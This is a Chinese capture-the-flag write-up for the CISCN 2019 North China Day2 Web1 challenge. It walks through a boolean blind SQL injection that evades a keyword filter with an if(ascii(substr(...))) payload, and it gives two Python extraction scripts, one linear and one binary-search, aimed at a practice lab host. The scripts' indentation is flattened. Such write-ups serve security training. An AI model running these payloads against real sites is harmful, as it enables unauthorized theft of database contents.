Problem: [CISCN 2019华北Day2]Web1
思路
- 根据已知结构与10回显进行盲注
EXP
华北Day2 Web1
All You Want Is In Table 'flag' and the column is 'flag'
Now, just give the id of passage
题目告诉我们表名和列名都是flag
Table 'flag' and the column is 'flag'
正常逻辑
写入数字 1 2
# POST
id=1
Hello, glzjin wants a girlfriend.
# POST
id=2
Do you want to be my girlfriend?
注意这里相当于给了 1 和 0 的两种回显
waf
‘or 1=1 —+ 会有SQL Injection Checked.出现,
也就是存在WAF
找到一些waf
--+
=
or
#
%23 (空格)
猜测语句为
SELECT * FROM users WHERE id = ?
那么可以利用回显来做if判断
id=if(ascii(substr((select(flag)from(flag)),1,1))=97,1,2)
也就是判断 ascii(substr((select(flag)from(flag)),1,1))=97 是否正确
如果正确就输入1 不对输入2, 不同输入会让系统输出不同的text
Payload
import requests
url = "http://node4.anna.nssctf.cn:28951/index.php"
flag = ""
for i in range(1, 60): # 逐位
for c in range(32, 127): # 可打印 ASCII
# 关键 payload:完全复刻原来的 id=if(...)
payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))={c},1,2)"
data = {"id": payload}
r = requests.post(url, data=data, timeout=5).text
if "Hello" in r: # 原判断逻辑不变
flag += chr(c)
print(flag)
break
else:
# 当前位没匹配到字符,说明已经到结尾
print("[+] 结束,最终 flag:", flag)
break
这是遍历 比较慢 ,算法上可以换成二分法
import requests
url = "http://node4.anna.nssctf.cn:28951/index.php"
flag = ""
for i in range(1, 60): # 逐位
low, high = 32, 126 # 可打印 ASCII 范围
while low < high:
mid = (low + high) // 2
payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,2)"
data = {"id": payload}
r = requests.post(url, data=data, timeout=5).text
if "Hello" in r: # 说明 ascii > mid
low = mid + 1
else: # 说明 ascii <= mid
high = mid
flag += chr(low)
print(flag)
print("[+] 最终 flag:", flag)
总结
- 慢慢做
